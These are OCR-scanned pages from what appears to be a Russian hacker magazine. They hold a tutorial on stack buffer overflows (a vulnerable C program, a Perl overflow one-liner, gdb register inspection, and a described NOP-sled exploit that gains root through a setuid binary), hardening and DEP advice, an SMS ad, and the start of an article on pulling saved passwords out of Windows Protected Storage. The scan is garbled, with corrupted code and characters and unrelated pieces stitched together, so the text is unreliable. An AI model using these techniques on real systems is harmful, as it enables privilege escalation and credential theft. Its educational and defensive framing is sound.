Но, как и у любой медали, у этих 
способов есть обратная сторона. На 
основе этой технологии можно соз- 
дать системы безопасности, различ- 
ные эмуляторы и т.д. А новый (OTHO- 
сительно :)) продукт oT Microsoft, 
Microsoft Windows AntiSpyware, с ygo- 
вольствием пресекает деятельность 
на основе большинства перечислен- 


ных методов. 
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СОКРУШИТЕЛЬНАЯ ATAKA ) 


Андрей Семенюченко (viruslist@gmail.com) 
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ак известно, эксплойт - 


это программа, которая 


использует уязвимость 


некоторой другой прог- 

раммы, чтобы предос- 
тавить несанкционированный доступ 
злоумышленника. Уязвимостью чаще 
всего оказывается возможностью пе- 
реполнения буфера, о которой и пой- 
дет речь. Скачать эксплойты предло- 
жат море бесплатных ресурсов, нап- 
ример те же новостные сайты, специа- 
лизирующиеся на информационной 
безопасности. Например, еси у.ллоу.ли, 
bugtrag.ru, зесипуа.ги - это русскоязычные 
ресурсы, на которых можно найти 
практически любое описание опубли- 
кованных уязвимостей, информацию 
о существующих исправлениях дан- 
ных ошибок и возможности обновле- 
ния на сайте разработчика. 


ЛОКАЛЬНЫЕ И УДАЛЕННЫЕ 
уязвимости 

m Тебя никогда не вводили в заб- 
луждение понятия локальной и уда- 
ленной уязвимости? Сейчас мы в этом 
разберемся. Если коротко, благодаря 
локальной уязвимости какой-либо 
программы локальные злоумышлен- 
ники вызывают переполнение одного 
из ее внутренних буферов, получив 


возможность выполнить произволь- 
ный код с теми правами и привилегия- 
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ми, с которыми запущена сама уязви- 
мая программа. Так, недавно в кон- 
сольном драйвере FreeBSD была об- 
наружена локальная уязвимость. 

Этот драйвер обеспечивает доступ к 
виртуальным терминалам. В функции 
CONS_SCRSHOT ioctl(2) обнаружена 
ошибка разбора входных данных, в 
результате которой (задав отрица- 
тельное или очень большое значение 
текущих координат) можно привести 
систему в нестабильное состояние. В 
результате получают доступ к важной 
системной информации ядра (в том 
числе, в некоторых случаях, прочесть 
введенные пароли), а также к повы- 
шению локальных полномочий. Ис- 
пользовать уязвимость может только 
пользователь, получивший физичес- 
кий доступ к локальной консоли (к 
файлам /dev/tty*). 

Удаленная уязвимость позволяет 
атакующему удаленно применить 
эксплойт к уязвимому сетевому сер- 
вису, тем самым выполнив удаленный 
шелл-код для получения доступа к 
удаленной системе. Например, часто 
бывает так, что длинная строка пере- 
дается на удаленный сервер, а тот за- 
вершает работу с ошибкой перепол- 
нения буфера. Написав эксплойт, ко- 
торый бы переполнял буфер и испол- 
нял удаленный шелл-код с правами 
запущенного сервера, он получает 
желанный доступ к системе. 

Понятия локальных и удаленных 
уязвимостей тесно пересекаются с оп- 
ределением шелл-кода. Шелл-код то- 
же бывает локальным и удаленным. 
Локальный шелл-код - это машинный 
код, после исполнения которого про- 
исходит доступ к оболочке системы (к 
cmd в Windows и к шелл-оболочке в 
*пх-системах). Отличие удаленного 
шелл-кода в том, что он, помимо всего 


прочего, открывает на удаленной ма- 
шине порт, после подключения на ко- 
торый предоставляется командная 
строка с правами доступа взломанно- 
го сервера. 


ПЕРЕПОЛНЕНИЕ БУФЕРА 

ш Итак, что же это за зверь - "пере- 
полнение буфера"? Это понятие поя- 
вилось одновременно с архитектурой 
Фон Неймана. Впервые широкую из- 
вестность оно получило в 1988 году 
вместе с интернет-червем Мурса. 

Во многих языках программирова- 
ния, например в распространенном С, 
не выполняется автоматическая про- 
верка границ в массивах или указате- 
лях - вот это и есть проблема пере- 
полнения буфера. Кроме того, станда- 
ртная библиотека С полна очень 
опасных функций, примеры которых 
есть на соответствующей врезке. 

При автоматическом выделении па- 
мяти для передачи аргументов проце- 
дурам и сохранения локальных пере- 
менных используется хранилище, на- 
зываемое стеком и которое является 
буфером типа LIFO (последним вошел - 
первым вышел). Когда программа вы- 
зывает функцию, создается новая 


strcpy(char *dest, const char *src) 


Может переполнить целевой буфер 


strcat(char *dest, const char *src) 


Может переполнить целевой буфер 


getwd(char *buf) 


Может переполнить буфер buf 


gets(char *s) 


Может переполнить буфер $ 


[vf]scanf(const char *format, ...) 


Может переполнить свои аргументы 


realpath(char *path, char resolved_path[]) 


Может переполнить буфер path 


[v]sprintf(char *str, const char *format, ...) 
Опасные функции языка С 


Может переполнить буфер str 


"граница стека", которая состоит из 
аргументов, переданных в функцию, а 
также динамического количества 
пространства локальных переменных. 
Существует несколько регистров про- 
цессора по управлению стеком. "Ука- 
затель стека" является регистром, 
хранящим текущее положение вер- 
шины стека. С помещением новых 
значений переменных в стек значе- 
ние этого регистра изменяется, поэто- 
му был реализован регистр "указа- 
тель границы", который расположен 
около начала стека, так что покаль- 
ные переменные можно легко адресо- 
вать относительно этого значения. 
Адрес возврата из функции также 
сохраняется в стеке, что вызывает на- 
рушение безопасности, связанное с 
переполнением стека, так как переза- 
писывание локальной переменной в 


функции может изменить адрес возв- 
рата из этой сфункции, потенциально 
позволяя злоумышленнику выпол- 
нить любой код. 


ВИДЫ ПЕРЕПОЛНЕНИЯ 

и Уже был рассмотрен частный слу- 
чай переполнения буфера - перепол- 
нение стека, которое может произой- 
ти при автоматическом выделении па- 
мяти. Переполнения автоматических 
буферов наиболее распространены. 
Размер таких буферов определяется 
на этапе компиляции. Процедура про- 
верки корректности обрабатываемых 
данных в этом случае ложится на пле- 
чи программистов, часто отсутствует 
или реализована с грубыми ошибка- 
ми. Переполнение происходит из-за 
присутствия в непосредственной бли- 
зости от автоматических буферов ад- 
реса возврата из функции, модидфи- 
кация которого позволяет злоумыш- 
леннику осуществить передачу уп- 
равления на произвольный код. 

При статическом выделении памяти 
происходит выделение памяти под 
данные внутри сегмента данных прог- 
раммы. Такие данные существуют на 
протяжении всей жизни программы 
go ее завершения. В случае неосто- 
рожного обращения программист мо- 
жет сильно облегчить работу хакера, 
так как при данном подходе к выделе- 
нию памяти это единственный тип бу- 
феров, адреса которых явно задают- 
ся еще на этапе компиляции. В ре- 
зультате может произойти перепол- 
нение в секции данных. 

Существует также динамическое вы- 
деление памяти. Выделение памяти 


под данные производится самой прог- 
раммой, когда это необходимо. Время 
жизни таких данных зависит от прог- 
раммы. Раньше считалось, что пере- 
полнения при динамическом выделе- 
нии памяти произойти не может или, 
минимум, это маловероятно. Счита- 
лось, что при таком раскладе макси- 
MYM, что светит хакеру, - DoS-ataka. В 
этом виновата хаотичность распреде- 
ления динамических блоков в памяти. 
Но как показала практика, буфера, 
расположенные в динамической па- 
мяти, также подвержены переполне- 
нию. Многие программисты сначала 
выделяют буфер фиксированного 
размера, а затем определяют, сколько 
памяти им реально необходимо, забы- 
вая обработать ситуацию недостатка 
памяти. Таким образом, злоумышлен- 
ник может осуществить переполне- 
ние кучи! 


ПРАКТИЧЕСКОЕ ПРИМЕНЕНИЕ 

m Для приобретения навыков в пе- 
реполнении буфера напишем прос- 
тенькую программу на языке С и поп- 
робуем осуществить переполнение 
стека с помощью функции strcpy(). 
Это классический случай, который ну- 
жен чтобы понять суть процесса, а 
любые дальнейшие модернизации 
программы ты сможешь без труда 
осуществить и сам. Пример будем де- 
монстрировать на старом добром 
Linux Red hat 9, но выбор системы в 
данном случае не принципиален и, 
как всегда, остается за тобой. 

Итак, рассмотрим следующий код. 


Hinclude <stdio.h> 
Hinclude <string.h> 
int main(int argc, char *argv(]) 


char fuffer[500]; 


strepy(buffer, агду(1]); 
printf(“You have entered: %s\n", 

buffer): 
return 0; 


} 


Перед нами go боли знакомая функ- 
ция main, содержащая два встроен- 
ных аргумента argc и argv. Аргумент 
argv типа char - указатель на массив 
строк. Каждый элемент массива ука- 
зывает на аргументы командной стро- 
ки. Один параметр отделяется от дру- 
гого пробелами. Соответственно, 
argv[O] - полное имя запущенной 
программы; агд\] - первая строка, за- 
писанная после имени программы. 

С помощью функции strcpy(cTpo- 
ка_назначения, строка_отправления) 
мы заполняем переменную buffer зна- 
чением первого аргумента. Результат 
выведем на экран с помощью функ- 
ции printf(. 

С виду простая программа, которую, 
казалось бы, трудно заставить вести 
себя некорректно. Поместим данный 


код в файл с названием Simple_code.c. 


Скомпилируем программу: 
gcc simple_prog.c -о simple 


Запустим программу, передав в Ka- 
честве аргумента "Life is perfect". 

Ha стандартный вывод получим 
строку 


You have entered: Life is perfect 


Теперь воспользуемся услугами Perl 
и передадим в качестве аргумента 
значение большее, чем было отведе- 
но для переменной buffer, например 
524: 


/simple ‘perl -e ‘print “X"x524"* 


Результатом программы будет вы- 
вод заданного числа символа "Х" и 
сообщения "Segmentation fault". Это 
значит, что программа завершилась с 
ошибкой, так как мы ввели число, за- 
ведомо превышающее размер пере- 
менной buffer. На самом деле число 
524 я взял не случайно: это число, 
при котором стек затирается пол- 
ностью, а если взять любое меньшее 


Поскольку 
число, например 523, программа за- большинство 
вершится корректно. эксплойтов со- 

держат 

инструкции 
ОТЛАДЧИК ВСЕМУ ГОЛОВА rial dol 


м Итак, переполнение бусфера (в 
данном случае стека) свершилось. Но 


массивах, мно- 
гие средства 


как использовать уязвимость прог- Ни 
? 
раммы в своих корыстных целях? Для о 


лучшего понимания воспользуемся 
популярным отладчиком gdb. 


вать злоумыш- 
ленника по 
этим инструк- 
ЦИЯМ. 


gdb /simple » 


Se = = > = 


Пишем программу, содержащую уязвимость 
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Тестируем программу simple на уязвимость 
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СОКРУШИТЕЛЬНАЯ ATAKA ) 


Данная команда позволяет войти в 
интерактивный режим отладчика. Те- 
перь запустим программу ./simple с 
необходимыми параметрами: 

г `рей-е‘рипЁ“Х"х524^ 

Получим сообщение вида: Program 
received signal SIGSEGV, Segmentation fault. 

Ha следующем шаге рассмотрим со- 
держание регистров процессора, вве- 
дя г: 


В данном случае нас интересует зна- 


ее чение регистров ebp и ер. 

патчи (РаХ и Регистр ЕВР - это регистр, который 
ExecShield), пре- указывает на текущий фрейм стека. С 
Атствующие его помощью мы можем обращаться к 
Pam данным в стеке. 

эксплойтов. Регистр ЕР содержит смещение сле- 


дующей команды, которую нужно вы- 
ПОЛНИТЬ. 

Значение ebp, как ты видишь, пол- 
ностью затерто символом "Х" (Ox58 в 
шестнадцатеричном формате). B eip, 
напротив, содержится какой-то мусор. 
Для того чтобы перетереть и этот ре- 
гистр, перегружаем наш буфер еще 
на четыре символа: 


Среди прочих получено следующее 
значение регистра eip: 


Это означает, что eip сейчас запол- 
нен символами "7" в шестнадцатерич- 
HOM сормате. Основная же цель - за- 
полнить этот регистр адресом шелл- 
кода, который мы хотим выполнить, и 
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Работаем с отладчиком — 
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тогда программа не будет вывали- 
ваться в Segmentation fault, а в каче- 
стве следующей команды выполнит 
наш шелл-код. 


ПИШЕМ ЭКСПлЛОЙТ 
Ну вот, в регистрах разобрались, 

как действовать, поняли, остается 
только написать соответствующий 
эксплойт. Посмотрим на код во врезке. 

Это довольно несложный код. Здесь 
мы сначала определяем размер уязви- 
мого буфера и резервируем 100 байт 
под собственные нужды. В перемен- 


ную linuxshell записываем один попу- 
лярный шелл-код для его дальнейше- 
го выполнения. Вообще говоря, суще- 
ствует огромное разнообразие шелл- 
кодов, многие из которых можно без 
труда бесплатно скачать и использо- 
вать по прямому назначению :). Далее 
следует функция $ро, содержащая ас- 
семблерную вставку, которая в свою 
очередь копирует значение указателя 
стека в переменную, возвращаемую 
этой функцией. Как ты помнишь, это 
один из основных моментов. 


Вот мы и добрались go функции 
main(), в рамках которой получаем 
указатель на стек и адрес возврата (в 
данном случае они будут идентичны- 
ми при нулевом смещении), затем вы- 
деляем память для нашего буфера, 
заполняем буфер адресом возврата и 
заполняем первую половину буфера 
инструкцией МОР. МОР - это инструк- 
ция \х90 в шестнадцатеричном cpop- 
мате, которая ничего не делает, толь- 
ко передает управление следующей 
инструкции. Иногда МОР использует- 
ся для создания задержек. 

Небольшое отступление, чтобы по- 
нять смысл использования МОР. 
Проблема, с которой мы столкнулись, - 
выяснение адреса расположения 
шелл-кода, который он получит, когда 
строка переполнения буфера будет 
помещена в стек. На помощь придет 
то, что начальный адрес стека не ме- 
няется при запуске каждого нового 
приложения. Поэтому, зная, где он на- 
чинается, возможно угадать пример- 
ное расположение бусфера, который 
планируется переполнить. Дело в 
том, что указатель стека указывает на 
начало стека, таким образом, адрес 
буфера нужно указать где-то побли- 
зости к нему. Но знаем ли мы точно, 
куда "прыгнуть", чтобы выполнить 
шелл-код? Практически всегда нет. 
Облегчить эту задачу можно вставкой 
символов МОР, что мы и сделали. Тем 
самым мы повысили вероятность уга- 
дывания. Таким образом, в случае 
удачи адрес возврата укажет на одну 
из команд МОР и вслед за ними вы- 
полнится шелл-код. 

Далее мы вставляем шелл-код в се- 
редину нашего буфера и вызываем 
уязвимую программу с буфером в ка- 
честве аргумента. Вуаля! 

Теперь дело за малым: назовем наш 
эксплойт expl.c и откомпилируем его: 


gec ./expl.c -o expl 


До выполнения exp! зададим root в Ka- 
честве владельца для программы sim- 
ре, чтобы при использовании эксплойта 
получить рутовые привилегии. 


chown 0 ,/simple 
chmod 4755 ,/simple 


Теперь зайдем в систему под любым 
непривилегированным пользовате- 
лем и запустим эксплойт. Если все бы- 
ло сделано правильно, на экране 
должна появиться решетка, то есть 
значок "#", символизирующий приг- 
лашение для суперпользователя! 


РЕАЛЬНЫЕ УЯЗВИМОСТИ 

и Ошибки, связанные с переполне- 
нием буфера, совершаются програм- 
мистами сплошь и рядом. Целью хаке- 
ра может стать любое приложение от 
интернет-браузеров и почтовых кли- 
ентов и gO средств обнаружения атак 
и антивирусов! 
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Пробуем применить эксплойт 
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Недавно в очересной раз была 
обнаружена уязвимость 
в стандартной библиотеке libc. 


О дырах в ослике IE ты, наверное, 
наслышан. Обычно ссылки на уязви- 
мости в "осле" именуются как "Мно- 
жественные уязвимости в Microsoft 
Internet Explorer" и встречаются на 
каждом шагу, поэтому рассказывать о 
них даже неинтересно. 

Намного интереснее взглянуть на 
баги, находящиеся в программном 
обеспечении, призванном защищать 
наши компьютеры, то есть системы 
обнаружения атак, межсетевые эк- 
раны, антиспамы, антивирусы и дру- 
гие средства блокировки вредонос- 
ного ПО. 

Так, недавно была обнаружена серь- 
езная уязвимость в антивирусах ком- 
пании Symantec. Ошибка в обработке 
ирх-файлов способна привести к пе- 
реполнению буфера, а как следствие к 
этому, сканер вместо удаления вируса 
выполняет его код. В "группу риска" 
входят такие продукты, как 
SystemWorks 2004 и Symantec Mail 
Security for Exchange. Опасность ycy- 
губляется тем, что ряд почтовых Cep- 
веров может использовать уязвимые 
библиотеки, таким образом, атаке под- 
вержены не только машины конечных 
пользователей, но и критичные узлы, 
работающие nog Microsoft Windows, 
Mac OS X, Linux, Solaris и АХ. Группа 
разработчиков выпустила патч, pacn- 
ространяющийся через LiveUpdate. 

Небезызвестный файрвол Microsoft 
Internet Security and Acceleration 
Server (MS ISA Server), как оказалось, 
не менее подвержен атакам. Уязви- 
мость присутствует в фильтре прото- 
кола телефонии H.323 и позволяет 
злоумышленнику произвести пере- 
полнение буфера в компоненте-сер- 
висе ISA, реализующем функцио- 
нальность межсетевого экрана, - 


Microsoft Firewall Service. Это может 
привести к выполнению злоумыш- 
ленником произвольного кода в кон- 
тексте безопасности сервиса, что да- 
ет практически полный контроль над 
атакованной системой. Основная бе- 
да в том, что при установке програм- 
много обеспечения MS ISA Server в 
режиме межсетевого экрана или в 
интегрированном режиме фильтр 
Н.323 включен по умолчанию. Поэто- 
му администраторы систем, у кото- 
рых данное ПО работает в режиме 
кеша, могут спать спокойно: их сис- 
темы не подвержены данной уязви- 
мости. Microsoft выпустила бюлле- 
тень по безопасности MSO4-001, ко- 
торый содержит сведения о соответ- 
ствующем исправлении, в том числе 
информацию о файлах и вариантах 
развертывания. 

*пр-системы также не являются иск- 
лючением, и ошибки, связанные с пе- 
реполнением буфера, встречаются в 
продуктах, разработанных для данных 
систем, очень часто. Недавно в очересд- 
ной раз была обнаружена уязвимость 
в стандартной библиотеке libc, входя- 
щей в состав FreeBSD, на этот раз в ре- 
ализации функции realpath, входящей 
в библиотеку libc. Ошибка связана с 
определением длины строки и, следо- 
вательно, приводит к переполнению 
буфера. Возможные последствия (DoS- 
атаки, удаленное выполнение кода, по- 
вышение уровня доступа) зависят от 
конкретного приложения, использую- 
щего срункцию realpath и позиции бу- 
cpepa в стеке. Уязвимости подвержены 
все версии FreeBSD вплоть до 4.8- 
RELEASE и 5.0-RELEASE. 

Подробнее о переполнении буфера - 
в Спеце #08(45)/2004 
(www.xakep,ru/articles/magazine/2004.asp). 


Примером пе- 
реполнения ку- 
чи может слу- 
жить уязви- 
мость в 
Microsoft JPEG 
GDI+, описан- 
ная в бюллете- 
не по безопас- 
ности М$04- 
028. 


Иногда злоу- 
мышленник 
может исполь- 
зовать нес- 
колько 
эксплойтов. 
Первый для 
получения низ- 
коуровневых 
привилегий на 
машине-жертве, 
последующий - 
для достижения 
рутовых приви- 
легий. 


Использование 
IDS (Intrusion 
Detection 
Software) поз- 
воляет onpege- 
лить и блоки- 
ровать попыт- 
ки использо- 
вать перепол- 
нение буфера. 
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В Winamp v5.08c исправлена нашумев- 
шая бага, связанная с возможностью 


переполнения буфера 


МОЙ ДОМ - МОЯ КРЕПОСТЬ 

m Отошибок в коде, тем более от 
чужих, никто не застрахован, поэтому 
я настоятельно рекомендую планиро- 
вать и проводить периодические ра- 
боты по аудиту и настройке системы. 
Вот довольно сжатый перечень 
действий, которые, я надеюсь, помо- 
гут существенно повысить безопас- 
ность любой оси при минимуме затра- 
ченного времени и усилий. 

ш Мониторинг файловых полномо- 
чий и атрибутов. Регулярно прове- 
рять права доступа и целостность 
системных файлов. В *nix-cuctemax 
особое внимание уделить програм- 
мам с установленными битами setuid 
и setgid. 

и Блокировка неиспользуемых сер- 
висов. При установке по умолчанию 
большинство дистрибутивов пропи- 
сывает в автозагрузку множество 
программ и служб. Рекомендую ис- 
пользовать утилиты ps, netstat в 
*nix'ax и tasklist, netstat в Windows ХР 
для проверки. Команда netstat с оп- 
циями -а -р --inet поможет опреде- 
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лить, какие сетевые сервисы запуще- 
ны, а также просмотреть идентифика- 
торы процессов, ассоциированные с 
ними, (PID). 

mw Проверка целостности скачанных 
пакетов. С помощью утилит проверки 
Ма5-сумм контролировать целост- 
ность всех скачиваемых пакетов. 

и Использование безопасных сер- 
висов. Избавиться от всех потенци- 
ально опасных сервисов, таких как 
telnet, ftp, под и rsh, протоколы кото- 
рых подразумевают открытую переда- 
чу паролей и данных. Использовать 
безопасные утилиты, например ssh. 

ш Настройка параметров ядра. В 
*пх-системах возможно изменение 
некоторых параметров ядра, влияю- 
щих на безопасность. Псевдофайло- 
вая система /ргос предоставляет goc- 
туп к параметрам ядра. 

mg Использование МАТ. При наличии 
нескольких компьютеров в сети, полу- 
чающих доступ в интернет через от- 
дельный сервер, возможно использо- 
вание технологии МАТ (Network 
Address Translation), что существенно 
затрудняет атаки извне. 


ЗАЩИТА ОТ ПЕРЕПОЛНЕНИЯ 
БУФЕРА НА ПРОГРАММНО- 
АППАРАТНОМ УРОВНЕ 

m Пока рядовые компьютерщики 
изо всех сил пыжатся, настраивая 
свою ось и спасаясь от злобных хаке- 
ров, разработчики микропроцессоров 
и операционных систем тоже не стоят 
на месте, пытаясь облегчить твой не- 
легкий труд. И поверь, это не пустые 
слова, кое-какие результаты в данном 
направлении уже достигнуты. 

К примеру, компания AMD уже дав- 
но заявила, что процессоры Ор{егоп 
uv Athlon 64 могут обнаруживать и 
блокировать работу вредоносных 
программ, действие которых основа- 
но на переполнении буфера. Чипы 
AMD умеют не только обнаруживать 
переполнение буфера, но и предотв- 
ращать исполнение кода, который 
попадает в процессор после пере- 
полнения. 

Технология, названная Execution 
Protection, уже присутствует в выпус- 
каемых Athlon 64 и Opteron, и это нов- 
шество доступно для счастливых об- 
ладателей Windows XP Service Pack 2. 
AMD также утверждает, что Execution 
Protection уже работает сегодня в пю- 
бой системе с 64-х разрядными про- 
цессорами AMD nog Linux. 

Компания Intel в свою очередь зая- 
вила, что некий вариант этой техноло- 
гии используется в процессорах 
Itanium для серверов высокого уров- 
ня, а для "массовых" процессоров она 
проходит испытания. 

Kak уже было сказано, в Windows ХР 
со вторым сервис-паком предоставля- 
ется набор программных и аппарат- 
ных технологий, позволяющих выпол- 
нять дополнительную проверку со- 
держимого памяти и предотвращать 
запуск злонамеренного кода (техно- 


логия DEP - Data Execution Protection). 
Основное преимущество функции 
DEP - возможность предотвратить за- 
пуск злонамеренного кода из области 
данных. Как правило, содержимое 
стека и кучи по умолчанию не являет- 
ся исполняемым кодом. При исполь- 
зовании аппаратной реализации ком- 
понент DEP вызывает исключение 
при запуске кода из указанных место- 
положений. При программной реали- 
зации DEP для предотвращения за- 
пуска злонамеренного кода использу- 
ется механизм обработки исключе- 
ний, существующий в Windows. 

Управление DEP осуществляется 
довольно просто. В свойствах систе- 
мы нужно открыть вкладку "Дополни- 
тельно" и кликнуть "Параметры быст- 
родействия". В результате откроется 
окно с вкладкой "Предотвращение 
выполнения данных" - это то, что нам 
нужно. В принципе, пока имеется все- 
го два варианта настройки DEP. Мож- 
но либо включить DEP только для ос- 
новных программ и служб Windows, 
либо включить DEP для всех прог- 
рамм и служб, кроме выбранных 
тобой. 

Во многих *nix-cucTemax также суще- 
ствует защита от выполнения кода, 
находящегося в области данных. По- 
добная защита входит в некоторые 
дистрибутивы по умолчанию, напри- 
мер в OpenBSD, gr-security в Gentoo 
Linux или Trusted Debian. 


А НАПОСЛЕДОК Я СКАЖУ... 

и В этой статье были описаны клю- 
чевые механизмы атак, использую- 
щие ошибки с переполнением будре- 
ров, а также методы защиты от этого 
вида атак. Но если ты подумал, что 
жизнь взломщика проста, легка и без- 
заботна, спешу тебя огорчить. На са- 
мом деле путь поиска уязвимости и 
написания эксплойта весьма тернист 
и полон неприятных сюрпризов. Су- 
ществует море нюансов и тонкостей, 
которые возвышаются толстой сте- 
ной, преграждая дорогу к власти над 
миром. Во многих случаях хакеру при- 
ходится рассчитывать лишь на удачу, 
повторяя неудачные попытки снова и 
снова. Об этом обязательно напишу в 
следующий раз, ну а пока пока! Ах да, 
и помни, что лучший вид защиты - это 
нападение :)! 


Хочешь фирменный лого на свой сотовый? На диске к журналу есть новый СЮРПРИЗ, 
но он под паролем! Чтобы узнать пароль, 


Пришли код логотипа (к примеру “1001”) на номер 44.46, 
| . = пришли код wO169 на номер 4445. 


va 


Пришли код термина (к примеру “w0001"’) на номер 444.44, 


(код w0008) (код w0092) 
(код м0009) (код w0093) 
(код w0010) (код w0094) 
(код м0011) (код w0095) 
(код 0012) (код w0096) 
(код w0013) (код w0097) 
(код w0014) (код w0098) 
(код w0015) (код w0099) 
(код w0016) (код w0100) 
(код м 0017) (код w0101) 

(код w0018) (код w0102) 
(код w0019) (код w0103) 
(код w0020) (код w0104) 
(код w0021) (код w0105) 
(код w0022) (код w0106) 
(код w0023) (код w0107) 
(код w0023) (код w0108) 
(код w0025) (код w0109) 
(код w0026) (код w0110) 

(код w0027) (код м0111) 

(код w0028) (код w0113) 

(код w0029) (код м 0114) 

(код w0030) (код w0115) 

(код w0038) (код м 016) 

(код w0040) (код м017) 

(код м 0041) (код м 0118) 

(код w0042) (код м0119) 

(код w0043) (код w0120) 
(код w0044) (код w0121) 

(код w0045) (код w0128) 
(код w0047) (код w0129) 
(код w0048) (код м 0130) 
(код w0049) (код w0131) 

(код w0050) (код w0132) 
(код w0051) (код w0133) 
(код м0052) (код w0134) 
(код w0053) (код w0135) 
(код м0054) (код w0136) 
(код w0055) (код w0137) 
(код w0056) (код w0138) 
(код w0057) (код w0139) 
(код м 0058) (код w0140) 
(код w0059) (код w0141) 

(код w0060) (код w0142) 
(код 0061) (код w0143) 
(код w0062) (код w0144) 
(код w0063) (код w0145) 
(код w0064) (код w0146) 
(код w0065) (код w0147) 
(код w0066) (код м 0148) 
(код w0067) (код w0149) 
(код м0068) (код w0150) 
(код w0069) (код w0151) 

(код w0070) (код w0152) 
(код w0071) (код w0153) 
(код м 0072) (код м 0154) 
(код w0073) (код w0155) 
(код w0074) (код w0156) 
(код w0075) (код w0076) 


Пришли свои термины на номер 4445 в виде 93 
termini (например “98 баг”). Не более 160 
символов латиницей или 70 кириллицей. 


> 
> 


Подробности: www.i-free.ru, (095) 916-7253, (812) 118-4575, support@i-free.ru. Для заказа картинок включи услугу WAP/GPRS-goctyna в Интернет (оплачивается 

согласно твоему тарифному плану). Проверить возможность закачки можно зайдя на мар-сайт http://4446.ru. В случае ошибки уточни настройки в службе 

поддержки твоего оператора. Стоимость запроса на номер 4444 - 50,30 без учета налогов, на номер 4445 - 50,60 без учета налогов, на номер 4446 - 50,90 без 
учета налогов, на номер 4449 - 53,00 без учета налогов. В случае ошибочного запроса услуга считается оказанной. 


КАК СКРЫТОЕ СТАНОВИТСЯ ЯВНЫМ ) 


Bad_guy (создатель wWw.CRACKLAB.rU) 


КАК СКРЫТОЕ ~~ 
СТАНОВИТСЯ ЯВНЫМ 


ПРОНИКНОВЕНИЕ В PROTECTED STORAGE 
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ТЕПЕРЬ 


РАЗБИРАТЬСЯ 


m Что же это за прог- 


рамма такая - PSPV? 

PSPV расшисрровывает- 
ся как Protected Storage PassView. Слу- 
жит для того, чтобы залезать в защи- 
щенное хранилище паролей Windows и 


извлекать все его содержимое. 


Скачать текущую версию Protected 
Storage PassView и узнать подробнос- 
ти о ней можно на сайте 
www.nirsoft.net/utils/pspy.html. 

Еще есть программа Protected 
Storage Explorer, которая предостав- 
ляет те же возможности по извлече- 
нию паролей из защищенного храни- 
лища. Но по сравнению с Protected 
Storage PassView она лучше (но пом- 
ни: все на вкус и цвет), так как храни- 
лище паролей отображается в виде 
древообразной структуры, что, в 
принципе, верно с точки зрения орга- 
низации самого хранилища паролей. 
Пароли же отображаются не только в 
текстовом, но и в шестнадцатеричном 
виде, что также может быть полезно, 
к примеру, при несовместимости коди- 
POBOK шрисртов. 


Скачать Protected Storage Explorer 
можно с домашней страницы Wiili./rensi- 
cideas.com/psexplorer2.htm. 


КАКИЕ ПАРОЛИ МОЖНО НАЙТИ 
В ЗАЩИЩЕННОМ ХРАНИЛИЩЕ 
и Когда-то защищенное хранилище 
заинтересовывало многих прежде 
всего наличием паролей от ящиков 
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Outlook Express. Не секрет, что у мно- 
гих провайдеров логин и пароль goc- 
тупа к предоставляемому ящику в 
точности соответствует данным для 
подключения к модемному пулу. И ес- 
ли некоторым людям придет в голову 
не сохранять пароль для подключе- 
ния no dial-up в кеше, а вводить его 
каждый раз при необходимости подк- 
лючиться, то мало кто додумается не 
сохранять пароль ящика в Outlook 
Express, иначе будет уж слишком неу- 
добно. Значит, заполучив пароль от 
ящика, автоматом получаешь доступ 
и к самому соединению, и к личной 
переписке абонента провайдера. За 
примером провайдера, у которого как 
раз пароль на предоставляемый ящик 
и на подключение одинаковы, идти 
далеко не нужно: хотя бы весьма 
крупный и известный провайдер - 
"Россия-Он-Лайн" (ROL). 

В защищенном хранилище также 
хранится несколько типов других па- 
ролей: на автоматический вход в раз- 
делы сайтов, закрытые для общего 
доступа, при помощи Internet Explorer, 
от MSN Explorer и т.п. Вот простой 
пример доступа к защищенной облас- 
ти сайта www.cracklab.ru/ps.php. 

Поставив галочку "Сохранить па- 
роль", ты сохраняешь его в "суперза- 


щищенное" хранилище паролей и не- 
замедлительно видишь соответствен- 
ные изменения на скриншоте. 


ГДЕ НАХОДИТСЯ ХРАНИЛИЩЕ 
И КАК ОНО ВЫГЛЯДИТ 

и Задавшись целью заполучить па- 
роли ящиков от Outlook Express, нас- 
тоящие индейцы первым делом пыта- 
ются понять, откуда же ОЕ берет эти 
пароли. И делают это подсаживая "на 
хвост" Outlook'y шпионов Filemon (мо- 
нитор взаимодействия приложений с 
файловой системой) и Regmon (мони- 
тор взаимодействия приложений с ре- 
естром Windows). В Windows 98 цель 
достигается легко, и выслеживается 
необходимое место в реестре, где на- 
ходятся все данные хранилища. Под 
Windows ХР это оказалось сложнее. 
Дело в том, что та ветвь реестра по 
умолчанию закрыта на доступ, разре- 
шение на него приходится ставить 
вручную, сам же путь в реестре выг- 
лядит так: 
HKEY_CURRENT_USER\Software\Micro 
soft\Protected Storage System 
Provider. B нем находится подветвь 
вида S-1-5-21-1935655697-884357618- 
83952215-1003, внутри которой и бу- 
дут видны древообразные структуры 
данных, которые держат в защищен- 
ном хранилище. 

Как показывает скриншот, ключи 
Behavior и Item Data содержат дан- 


ные, явно относящиеся к паролям, CO- 
держащимся в защищенном хранили- 
ще, однако самих паролей в открытом 
виде все равно нет. 


ПИШЕМ "РАСШИФРОВЩИК" 
Мысль написать расшифровщик 
была как раз первой пришедшей в го- 
лову, когда я увидел данные, содер- 
жащиеся в ключах Behavior и Item 
Data. Ho, попроверяв изменение дан- 
ных при смене пароля от ящика в ОЕ, 
я понял, что это будет непростой за- 
дачей. Необходимо посмотреть, как 
же сам Outlook Express расшифровы- 
вает эти данные. При помощи отлад- 
чика и дизассемблера начался раз- 
бор, поведавший мне, что сам по себе 
Outlook Express не работает с этими 
ветвями реестра: существует некая 
системная библиотека pstorec.dil gna 
непосредственной работы с защи- 
щенным хранилищем. У этой библио- 
теки есть все необходимые экспорти- 
руемые функции, которые выдают 
программе, использующей библиоте- 
ку, все возможности по работе с за- 
щищенным хранилищем: чтение, за- 
пись, стирание данных и отображение 
хранящихся в нем записей. 

Поискав что-нибудь о "pstorec.dll" в 
Google и Япаех, я нашел пару мест, 
где об этом что-то было, но информа- 
ция была очень скудной: например из 
MSDN, которая срактически не давала 
никаких возможностей самостоятель- 
но реализовать алгоритм использо- 
вания функций библиотеки. Также 
попался какой-то левый Visual Basic- 


исходник, перековерканный web-nap- 
сингом (примерно вот в таком же ви- 
ge - ‚ только 


здесь на С++) и никак не компилиро- 
вавшийся. 

Попробовал реализовать алгоритм 
на Delphi - началась долгая и упорная 
работа по разбору алгоритма. Выясни- 
лось, к примеру, что библиотеку 
pstorec.dll нужно обработать прежде 
